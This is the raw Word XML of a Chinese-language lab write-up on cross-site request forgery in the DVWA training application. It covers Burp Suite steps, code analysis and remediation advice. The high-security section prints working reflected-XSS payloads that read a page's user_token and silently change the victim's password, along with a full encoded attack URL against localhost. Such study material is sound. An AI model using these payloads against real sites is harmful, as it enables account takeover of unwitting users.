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跨站请求伪造</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0" w:rsidP="004B774C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRPr="000A3635" w:rsidRDefault="006A4EAA" w:rsidP="002A23F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站请求伪造是指</w:t>
      </w:r>
      <w:r w:rsidR="004F2B01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者引诱用户访问页面，攻击页面使用该用户身份在第三方网站自动进行操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B774C" w:rsidRDefault="004B774C" w:rsidP="004B774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测试工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B774C" w:rsidRPr="004B774C" w:rsidRDefault="004B774C" w:rsidP="004B774C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp suite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0" w:rsidP="004B774C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</w:p>
    <w:p w:rsidR="002A23F0" w:rsidRPr="00AA75AE" w:rsidRDefault="002A23F0" w:rsidP="004B774C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urpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并开启代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0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8044FC4" wp14:editId="08750AEB">
            <wp:extent cx="5274310" cy="2837994"/>
            <wp:effectExtent l="0" t="0" r="2540" b="63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refox</w:t>
      </w:r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2A23F0" w:rsidRDefault="002A23F0" w:rsidP="002A23F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D307E64" wp14:editId="186D6B77">
            <wp:extent cx="5274310" cy="2880115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686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关闭</w:t>
      </w:r>
      <w:r w:rsidR="002A23F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="002A23F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A6860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8C0835B" wp14:editId="4C7C0CB4">
            <wp:extent cx="5274310" cy="2849592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255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irefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器发起登陆请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="00923258" w:rsidP="002A23F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E003CA4" wp14:editId="7A2344F4">
            <wp:extent cx="5274310" cy="2845930"/>
            <wp:effectExtent l="0" t="0" r="254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urpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00923258">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidR="00923258">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00923258">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="007D2E27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6193BA1" wp14:editId="0111540D">
            <wp:extent cx="5274310" cy="2849592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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90" w:rsidRDefault="00A81298" w:rsidP="002A23F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0D231EB" wp14:editId="6AD1CAE1">
            <wp:extent cx="5274310" cy="2841657"/>
            <wp:effectExtent l="0" t="0" r="2540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90" w:rsidRDefault="007308DE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D60FC29" wp14:editId="5CB667AA">
            <wp:extent cx="5274310" cy="2861191"/>
            <wp:effectExtent l="0" t="0" r="254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390" w:rsidRDefault="007308DE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CB3DC7E" wp14:editId="7B1EB1A6">
            <wp:extent cx="5274310" cy="2845930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0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分析结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="007308DE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3923260" wp14:editId="7AA37D7D">
            <wp:extent cx="5274310" cy="2853255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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6C7164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代码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="0087402A" w:rsidP="002A23F0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D1224D6" wp14:editId="6C1C0C51">
            <wp:extent cx="5274310" cy="2219605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="95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2A23F0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2A23F0" w:rsidRDefault="0087402A" w:rsidP="002A23F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码过程针对第三方站点自动化请求无任何防御机制，可以在用户登录状态下由第三方站点自动发起修改密码操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0" w:rsidP="004B774C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2A23F0" w:rsidRDefault="002A23F0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FD54D2" w:rsidRDefault="00FD54D2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urpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并开启代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD54D2" w:rsidRDefault="00FD54D2" w:rsidP="00FD54D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B1172E5" wp14:editId="37716B39">
            <wp:extent cx="5274310" cy="2837994"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6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FD54D2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refox</w:t>
      </w:r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FD54D2" w:rsidRDefault="00FD54D2" w:rsidP="00FD54D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52B2DBF" wp14:editId="3486A92B">
            <wp:extent cx="5274310" cy="2880115"/>
            <wp:effectExtent l="0" t="0" r="2540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FD54D2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urpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD54D2" w:rsidRDefault="00FD54D2" w:rsidP="00FD54D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14939D" wp14:editId="096FC255">
            <wp:extent cx="5274310" cy="2849592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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FD54D2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irefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器发起登陆请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD54D2" w:rsidRDefault="00FD54D2" w:rsidP="00FD54D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F7EF79F" wp14:editId="64EE3FD6">
            <wp:extent cx="5274310" cy="2845930"/>
            <wp:effectExtent l="0" t="0" r="2540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FD54D2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urpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD54D2" w:rsidRDefault="00B27BFC" w:rsidP="00FD54D2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313F3F9" wp14:editId="4F835B44">
            <wp:extent cx="5274310" cy="2864854"/>
            <wp:effectExtent l="0" t="0" r="2540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B27BFC" w:rsidP="00FD54D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D51284D" wp14:editId="2D8401B1">
            <wp:extent cx="5274310" cy="2857528"/>
            <wp:effectExtent l="0" t="0" r="254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904FF6" w:rsidP="00FD54D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C41B68C" wp14:editId="4004EB22">
            <wp:extent cx="5274310" cy="2280040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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4B" w:rsidRDefault="0044524B" w:rsidP="00647023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7BD3BC4" wp14:editId="51AA7B76">
            <wp:extent cx="5274310" cy="946812"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715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4B" w:rsidRDefault="008A3F6A" w:rsidP="00647023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44F2C9F" wp14:editId="3C6F7F91">
            <wp:extent cx="5274310" cy="2785495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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D2" w:rsidRDefault="00FD54D2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分析结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD54D2" w:rsidRDefault="008A3F6A" w:rsidP="00FD54D2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C7DB32C" wp14:editId="1D4F5C21">
            <wp:extent cx="5274310" cy="2849592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255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6C7164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代码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="00FE0190" w:rsidP="002A23F0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8E19DC" wp14:editId="4E82C56B">
            <wp:extent cx="5274310" cy="2729944"/>
            <wp:effectExtent l="0" t="0" r="254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F0" w:rsidRDefault="002A23F0" w:rsidP="002A23F0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2A23F0" w:rsidRPr="008D1709" w:rsidRDefault="002A23F0" w:rsidP="002A23F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="008C6E16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求来源使用</w:t>
      </w:r>
      <w:r w:rsidR="008C6E16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">http </w:t>
      </w:r>
      <w:r w:rsidR="008C6E16">
        <w:t>referrer</w:t>
      </w:r>
      <w:r w:rsidR="008C6E16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头信息进行检查</w:t>
      </w:r>
      <w:r w:rsidR="008A3F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是检查逻辑存在问题，检查逻辑为在</w:t>
      </w:r>
      <w:r w:rsidR="008A3F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidR="008A3F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中查找服务器</w:t>
      </w:r>
      <w:r w:rsidR="00A77C2A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称，若查找到则成功，否则</w:t>
      </w:r>
      <w:r w:rsidR="008A3F6A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0" w:rsidP="004B774C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2A23F0" w:rsidRDefault="002A23F0" w:rsidP="006C716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4D3496" w:rsidRDefault="00104EA2" w:rsidP="006C716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借助反射型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="004D3496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="004D3496">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3945" w:rsidRDefault="001A3945" w:rsidP="006C7164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反射性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038378E" w:rsidRDefault="0038378E" w:rsidP="0038378E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload: </w:t>
      </w:r>
      <w:r w:rsidR="002E268E" w:rsidRPr="002E268E">
        <w:t>&lt;img src="" onerror="alert(/xss/)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D3496" w:rsidRDefault="001A3945" w:rsidP="001A3945">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09DC7211" wp14:editId="6910A1A2">
            <wp:extent cx="5274310" cy="286119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45" w:rsidRDefault="001A3945" w:rsidP="001A3945">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E15AB2E" wp14:editId="6054C9B1">
            <wp:extent cx="5274310" cy="2849592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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45" w:rsidRDefault="001A3945" w:rsidP="006C7164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通过反射型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取修改密码表单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user_token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3945" w:rsidRDefault="001A3945" w:rsidP="001A3945">
      <w:pPr>
        <w:ind w:left="840"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3945">
        <w:t xml:space="preserve"> &lt;iframe src="../csrf/" onload="alert(frames[0].document.getElementsByName('user_token')[0].value)"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0038378E" w:rsidRDefault="002E268E" w:rsidP="00EE4B8C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCA7E2B" wp14:editId="0656FC8F">
            <wp:extent cx="5274310" cy="2861191"/>
            <wp:effectExtent l="0" t="0" r="254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45" w:rsidRDefault="001A3945" w:rsidP="006C7164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利用反射性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动提交修改密码表单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E268E" w:rsidRDefault="002E268E" w:rsidP="002E268E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="002E268E">
        <w:t>&lt;iframe src="../csrf" onload="var t=frames[0].document.getElementsByName('user_token')[0].value,x=new XMLHttpRequest();x.open('GET', '../csrf/?password_new=test123&amp;password_conf=test123&amp;Change=Change&amp;user_token='+t, null);x.send()"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E268E" w:rsidRDefault="002E268E" w:rsidP="002E268E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E268E" w:rsidRDefault="002E268E" w:rsidP="002E268E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起攻击连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009D5B0D" w:rsidRPr="009D5B0D">
        <w:t xml:space="preserve"> http://localhost/DVWA-1.9/vulnerabilities/xss_r/?name=%3Ciframe+src%3D%22..%2Fcsrf%22+onload%3D%22var+t%3Dframes%5B0%5D.document.getElementsByName%28</w:t>
      </w:r>
      <w:r w:rsidR="009D5B0D" w:rsidRPr="009D5B0D">
        <w:lastRenderedPageBreak/>
        <w:t>%27user_token%27%29%5B0%5D.value%2Cx%3Dnew+XMLHttpRequest%28%29%3Bx.open%28%27GET%27%2C+%27..%2Fcsrf%2F%3Fpassword_new%3Dtest123%26password_conf%3Dtest123%26Change%3DChange%26user_token%3D%27%2Bt%2C+null%29%3Bx.send%28%29%22%3E%3C%2Fiframe%3E#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E268E" w:rsidRDefault="002E268E" w:rsidP="002E268E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E268E" w:rsidRDefault="002E268E" w:rsidP="002E268E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为修改后密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E268E" w:rsidRDefault="002E268E" w:rsidP="00EE4B8C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5223B19F" wp14:editId="3E61F907">
            <wp:extent cx="5274310" cy="2849592"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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6" w:rsidRDefault="004D3496" w:rsidP="006C716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分析结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D3496" w:rsidRDefault="002E268E" w:rsidP="004D349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F9B5A55" wp14:editId="15E55216">
            <wp:extent cx="5274310" cy="2869737"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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68E" w:rsidRDefault="002E268E" w:rsidP="004D3496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8ADC5A" wp14:editId="7F3431AC">
            <wp:extent cx="5274310" cy="2853255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445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6" w:rsidRDefault="004D3496" w:rsidP="006C7164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代码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D3496" w:rsidRDefault="000004EA" w:rsidP="004D3496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062908B" wp14:editId="304FDE1E">
            <wp:extent cx="5274310" cy="2502245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="269" name="图片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96" w:rsidRDefault="004D3496" w:rsidP="004D3496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2A23F0" w:rsidRPr="009D0085" w:rsidRDefault="004D3496" w:rsidP="00104EA2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="000004EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求进行随机</w:t>
      </w:r>
      <w:r w:rsidR="000004EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="000004EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证，</w:t>
      </w:r>
      <w:r w:rsidR="00104EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要借助</w:t>
      </w:r>
      <w:r w:rsidR="000004EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidR="000004EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00104EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0" w:rsidP="004B774C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0" w:rsidP="006C7164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对于修改数据和登陆表单提交使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidR="00666CA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，同时数据通过</w:t>
      </w:r>
      <w:r w:rsidR="00666CA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="00666CA5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式读取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A23F0" w:rsidRDefault="002A23F0" w:rsidP="006C7164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添加随机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9322D" w:rsidRDefault="00B9322D" w:rsidP="006C7164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对提交的请求进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证，验证规则请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http(s)://host:port/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9322D" w:rsidRDefault="00B9322D" w:rsidP="006C7164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针对修改密码，需要输入原密码进行验证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00385EC2" w:rsidRPr="00385EC2" w:rsidRDefault="00B9322D" w:rsidP="003D666E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可添加验证码进行用户确认</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00385EC2" w:rsidRPr="00385EC2" w:rsidSect="00441460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65F" w:rsidRDefault="0070065F" w:rsidP="004508AC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0070065F" w:rsidRDefault="0070065F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66E" w:rsidRPr="003D666E">
          <w:rPr>
            <w:noProof/>
            <w:lang w:val="zh-CN"/>
          </w:rPr>
          <w:t>13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65F" w:rsidRDefault="0070065F" w:rsidP="004508AC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0070065F" w:rsidRDefault="0070065F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吴科</w:t>
    </w:r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微信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13172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6DC9"/>
    <w:rsid w:val="00312EB9"/>
    <w:rsid w:val="003209B0"/>
    <w:rsid w:val="00321C3F"/>
    <w:rsid w:val="0032275C"/>
    <w:rsid w:val="003244F0"/>
    <w:rsid w:val="00325615"/>
    <w:rsid w:val="003367C8"/>
    <w:rsid w:val="0038378E"/>
    <w:rsid w:val="00385EC2"/>
    <w:rsid w:val="003A0E5B"/>
    <w:rsid w:val="003A45F2"/>
    <w:rsid w:val="003B1FF1"/>
    <w:rsid w:val="003C4EFB"/>
    <w:rsid w:val="003D2682"/>
    <w:rsid w:val="003D5E91"/>
    <w:rsid w:val="003D666E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56D7"/>
    <w:rsid w:val="00481B16"/>
    <w:rsid w:val="0049210A"/>
    <w:rsid w:val="00494714"/>
    <w:rsid w:val="00497F58"/>
    <w:rsid w:val="004A1D8B"/>
    <w:rsid w:val="004B774C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783"/>
    <w:rsid w:val="00671EE8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065F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A39AD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6244D"/>
    <w:rsid w:val="00A63580"/>
    <w:rsid w:val="00A77C2A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2AC8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50A2"/>
    <w:rsid w:val="00D534FB"/>
    <w:rsid w:val="00D759B9"/>
    <w:rsid w:val="00D774D1"/>
    <w:rsid w:val="00D9287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AC1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74847"/>
    <w:rsid w:val="00F847BC"/>
    <w:rsid w:val="00F85CB9"/>
    <w:rsid w:val="00F94970"/>
    <w:rsid w:val="00F94D2A"/>
    <w:rsid w:val="00FA27C9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98F12-FCE8-431C-A2E1-44B1197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3</Pages>
  <Words>250</Words>
  <Characters>1427</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop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吴科</cp:lastModifiedBy>
  <cp:revision>411</cp:revision>
  <cp:lastPrinted>2019-02-15T08:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-24T04:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-15T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>